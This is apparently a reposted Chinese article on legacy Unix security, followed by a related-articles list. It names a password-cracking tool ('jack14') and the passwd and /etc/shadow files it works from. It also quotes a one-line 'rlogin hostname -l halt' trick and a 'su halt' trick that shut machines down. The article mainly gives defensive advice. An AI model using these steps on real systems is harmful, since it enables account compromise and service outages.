一个算passwd的程序, 能在 Pentium 100机器上用半个小时左右的时间算出长度<=5 && 只包含字母和数字 的口令. 因此选口令的时候要注意. 用jack14既可,攻击得当的话6位不含大写字母的pass也能在一月内破掉。
这一方法要求必须取得对方含有密文的passwd文件(有shadow passwd的机器上需要取得/etc/shadow), 所以要注意机器上passwd的安全性 (不要试图取消用户对该文件的读权限, 所有的用户都需要能读该文件).
-----
解决的办法, 可以用firewall屏蔽网段。
也可以使用SSL(secure socket layber)替代原有的socket明文数据传输。
-----
:若干机器上都是用户可以直接su halt, 然后就成为超级用户了, :-)
:有的机器你可以用rlogin hostname -l halt 对方的机器就被shutdown了,: 哈哈.
我用su halt 然后就shutdown了. 有n个文件没有存盘.
[b:59a25412aa][/b:59a25412aa][b:59a25412aa][/b:59a25412aa]
原文转自:www.ltesting.net
★ arthur诊断故事第一集vol的故事Windows系统
★ FC3 下安装 VMware GSX Server 心得Unix系统
【如何保障Unix系统安全Windows系统(合集6篇)】相关文章:
英文自我介绍信2022-11-25
端口转发软件rinetd安装部署linux服务器应用2022-04-30
谁不是“过渡技术”?2022-10-11
包装设计系大学生英文求职信2023-05-23
php实习报告2022-10-05
系统运维工程师工作职责与任职要求2023-04-22
FLASHFlash+php+mysql简单留言本制作2022-05-06
计算机实习简短自我鉴定2023-01-20
下半年网络工程师填空题总结2022-08-11
网络系统工程填空题2023-07-27